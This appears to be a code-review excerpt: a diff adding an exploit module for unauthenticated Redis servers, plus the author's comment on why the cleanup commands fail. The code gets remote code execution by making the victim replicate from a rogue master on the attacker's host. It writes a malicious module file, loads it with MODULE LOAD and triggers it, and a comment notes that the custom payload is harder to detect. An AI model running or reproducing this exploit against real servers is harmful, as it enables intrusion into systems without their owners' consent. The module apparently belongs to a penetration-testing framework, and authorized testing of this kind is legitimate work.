modules/exploits/linux/redis/redis_unauth_exec.rb

```diff
@@ -0,0 +1,271 @@
+        {
+          'Stability'   => [ SERVICE_RESOURCE_LOSS],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ]
+        },
+      ))
+
+    register_options(
+      [
+        Opt::RPORT(6379),
+        OptBool.new('CUSTOM', [true, 'Whether compile payload file during exploiting', true])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('RedisModuleInit', [false, 'The command of module to load and unload. Random string as default.']),
+        OptString.new('RedisModuleTrigger', [false, 'The command of module to trigger evil function. Random string as default.']),
+        OptString.new('RedisModuleName', [false, 'The name of module to load at first. Random string as default.'])
+      ]
+    )
+    deregister_options('URIPATH', 'THREADS', 'SSLCert')
+  end
+
+  #
+  # Now tested on redis 4.x and 5.x
+  #
+  def check
+    connect
+    # they are only vulnerable if we can run the CONFIG command, so try that
+    return Exploit::CheckCode::Safe unless (config_data = redis_command('CONFIG', 'GET', '*')) && config_data =~ /dbfilename/
+
+    if (info_data = redis_command('INFO')) && /redis_version:(?<redis_version>\S+)/ =~ info_data
+      report_redis(redis_version)
+    end
+
+    Exploit::CheckCode::Vulnerable
+  ensure
+    disconnect
+  end
+
+  def exploit
+    if check_custom
+      @module_init_name = datastore['RedisModuleInit']    || Rex::Text.rand_text_alpha_lower(4..8)
+      @module_cmd       = datastore['RedisModuleTrigger'] || "#{@module_init_name}.#{Rex::Text.rand_text_alpha_lower(4..8)}"
+    else
+      @module_init_name = "shell"
+      @module_cmd       = "shell.exec"
+    end
+
+    if srvhost == "0.0.0.0"
+      fail_with(Failure::BadConfig, "Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.")
+    end
+
+    #
+    # Prepare for payload.
+    #
+    #  1. Use custcomed payload, it would compile a brand new file during running, which is more undetectable.
+    #     It's only worked on linux system.
+    #
+    #  2. Use compiled payload, it's avaiable on all OS, however more detectable.
+    #
+    if check_custom
+      buf = create_payload
+      generate_code_file(buf)
+      compile_payload
+    end
+
+    connect
+
+    #
+    # Send the payload.
+    #
+    redis_command('SLAVEOF', srvhost, srvport.to_s)
+    redis_command('CONFIG', 'SET', 'dbfilename', "#{module_file}")
+    ::IO.select(nil, nil, nil, 2.0)
+
+    # start the rogue server
+    start_rogue_server
+    # waiting for victim to receive the payload.
+    Rex.sleep(1)
+    redis_command('MODULE', 'LOAD', "./#{module_file}")
+    redis_command('SLAVEOF', 'NO', 'ONE')
+
+    # Trigger it.
+    print_status('Sending command to trigger payload.')
+    pull_the_trigger
+
+    # Clean up
+    Rex.sleep(2)
+    register_file_for_cleanup("./#{module_file}")
+    #redis_command('CONFIG', 'SET', 'dbfilename', 'dump.rdb')
+    #redis_command('MODULE', 'UNLOAD', "#{@module_init_name}")
```

Comment:
Please take note this cleanup, I commented the last two Redis commands, for it's always failed.
The reason is once a new session started, the Redis would get blocked and give no response to any request, which leads the command for cleanup to always failed.

To clean it successfully, we have to wait for the session ends. Actually, I did not know how to do it. :-(